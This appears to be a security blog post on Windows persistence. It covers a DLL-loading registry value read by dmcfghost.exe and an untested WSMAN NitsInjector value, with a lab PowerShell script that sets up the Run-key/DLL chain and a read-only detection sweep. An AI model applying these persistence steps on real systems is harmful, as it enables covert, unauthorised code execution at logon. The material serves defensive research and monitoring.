Beyond good ol’ Run key, Part 91

This is a mixed persistence trick/LOLBIN.

There is a program in the Windows system directory that is very rarely used: dmcfghost.exe. As far as I can tell it has something to do with the OMA Client Provisioning (OMA-CP) protocol (the internal description of the binary reads ‘Host Process for Push Router Client of OMA-CP’).

When you run it and its internal checks pass (I don’t fully understand the logic inside the program, but on Windows 10 they appear to always succeed), it loads the DLL named by the following registry value:

  • HKLM\SOFTWARE\Microsoft\PushRouter\
    Test\TestDllPath2=<DLL>

So, adding e.g. a Run key pointing to dmcfghost.exe ensures that this binary is executed every time the user logs on, and the ‘test’ DLL is loaded along with it. Note that the PushRouter key lives under HKLM, so writing TestDllPath2 requires administrative rights; the Run key itself can be a per-user one.
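The chain above as an added lab reproduction (this is not the post’s own code): stage a DLL path in TestDllPath2, register dmcfghost.exe as a Run entry, trigger it once, and look for the DLL load. The DLL path and the Run value name are assumptions; any benign DLL you built whose DllMain drops a marker file will do. Run it elevated on a throwaway Windows 10 VM.

```powershell
# Added example, not from the original post. Run elevated on a test VM:
# the PushRouter key is under HKLM, so writing TestDllPath2 needs admin rights.
$dll     = 'C:\Lab\test.dll'   # ASSUMPTION: a benign DLL whose DllMain writes a marker file
$hostExe = Join-Path $env:SystemRoot 'System32\dmcfghost.exe'
$testKey = 'HKLM:\SOFTWARE\Microsoft\PushRouter\Test'
$runKey  = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'

if (-not (Test-Path -LiteralPath $hostExe)) { throw 'dmcfghost.exe is not present on this build' }

# 1. The value dmcfghost.exe reads to locate its 'test' DLL.
New-Item -Path $testKey -Force | Out-Null
New-ItemProperty -Path $testKey -Name 'TestDllPath2' -Value $dll -PropertyType String -Force | Out-Null

# 2. A plain per-user Run entry so the host (and therefore the DLL) starts at every logon.
#    'PushRouterHost' is an arbitrary value name chosen for this example.
New-ItemProperty -Path $runKey -Name 'PushRouterHost' -Value $hostExe -PropertyType String -Force | Out-Null

# 3. Trigger it once now instead of waiting for a logon.
$p = Start-Process -FilePath $hostExe -PassThru
Start-Sleep -Seconds 3

# 4. Evidence of the load: the module list while the process is still alive, and
#    Sysmon event ID 7 (ImageLoad) if Sysmon is installed. The marker file written
#    by DllMain is the most reliable signal if the process exits quickly.
if (-not $p.HasExited) {
    $p.Modules | Where-Object { $_.FileName -ieq $dll } | ForEach-Object { "loaded: $($_.FileName)" }
}
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 7 } `
             -MaxEvents 50 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'dmcfghost\.exe' -and $_.Message -match [regex]::Escape($dll) } |
    Select-Object TimeCreated, Message

# 5. Cleanup so the VM does not keep the autorun.
Remove-ItemProperty -Path $runKey  -Name 'PushRouterHost' -ErrorAction SilentlyContinue
Remove-ItemProperty -Path $testKey -Name 'TestDllPath2'   -ErrorAction SilentlyContinue
```

From a detection standpoint the interesting artefacts are a write to HKLM\SOFTWARE\Microsoft\PushRouter\Test\TestDllPath2 (a value that should essentially never exist on a production host) and dmcfghost.exe loading an image from outside System32.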

Beyond good ol’ Run key, Part 90

After finding the ‘injection’ trick for Metro Apps I thought I would query the system files for any ‘inject’-related strings. This proved to be a fruitful exercise and I found one more key that I bet can be used for persistence. I say ‘bet’ because it’s one of the rare occasions in this series when I didn’t manage to test it successfully. It’s really late as I write this, I only just found it, and I don’t yet fully understand how to test it 🙂 More research is needed.

The value is read by DscCore.dll, which in turn seems to be loaded by Microsoft.Windows.DSC.CoreConfProviders.dll. The latter appears to be associated with Desired State Configuration (DSC):

  • HKLM\SOFTWARE\Microsoft\
    Windows\CurrentVersion\
    WSMAN\NitsInjector=<DLL>

In any case, it’s worth adding to your monitoring toolkit. If you manage to trigger it, please let me know… Thanks!
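An added audit script for the ‘monitoring toolkit’ angle of both parts above (not the post’s own code): it reports the two DLL-path values (TestDllPath2 and NitsInjector) if present, whether the referenced file exists and is Authenticode-signed, and any Run/RunOnce entry in any loaded hive that launches dmcfghost.exe. It is read-only; run it elevated for full HKLM and HKEY_USERS visibility. The ‘Signed’ field is based on Get-AuthenticodeSignature and says nothing about whether the signer is trusted.

```powershell
# Added example, not from the original post. Read-only registry sweep for the
# TestDllPath2 / NitsInjector values and for autoruns that reference dmcfghost.exe.
$findings = @()

# Registry values that name a DLL to be loaded (from Parts 91 and 90).
$dllValues = @(
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\PushRouter\Test';                 Name = 'TestDllPath2' }
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN';    Name = 'NitsInjector' }
)
foreach ($v in $dllValues) {
    $item = Get-ItemProperty -Path $v.Path -Name $v.Name -ErrorAction SilentlyContinue
    if (-not $item) { continue }
    $dll    = [string]$item.($v.Name)
    $exists = [bool]($dll -and (Test-Path -LiteralPath $dll))
    $findings += [pscustomobject]@{
        Source = "$($v.Path)\$($v.Name)"
        Value  = $dll
        Exists = $exists
        Signed = if ($exists) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'n/a' }
    }
}

# Autorun entries in HKLM and every loaded user hive that launch the host process.
$runPaths = @('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
              'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce')
$hives = @('HKLM:') + (Get-ChildItem Registry::HKEY_USERS | ForEach-Object { "Registry::$($_.Name)" })
foreach ($hive in $hives) {
    foreach ($rp in $runPaths) {
        $key   = "$hive\$rp"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }        # skip PSPath, PSParentPath, ...
            if ("$($p.Value)" -match 'dmcfghost\.exe') {
                $findings += [pscustomobject]@{
                    Source = "$key\$($p.Name)"; Value = $p.Value; Exists = $true; Signed = 'n/a'
                }
            }
        }
    }
}

if ($findings) { $findings | Format-Table -AutoSize }
else { 'No TestDllPath2 / NitsInjector values and no dmcfghost.exe autoruns found.' }
```

On a clean Windows 10 host neither value should exist, so any hit is worth a look; a DLL path that resolves outside System32, or one that exists but is unsigned, is the strongest signal. For continuous coverage rather than a point-in-time sweep, the same two value paths are natural candidates for Sysmon RegistryEvent (event IDs 12/13) rules.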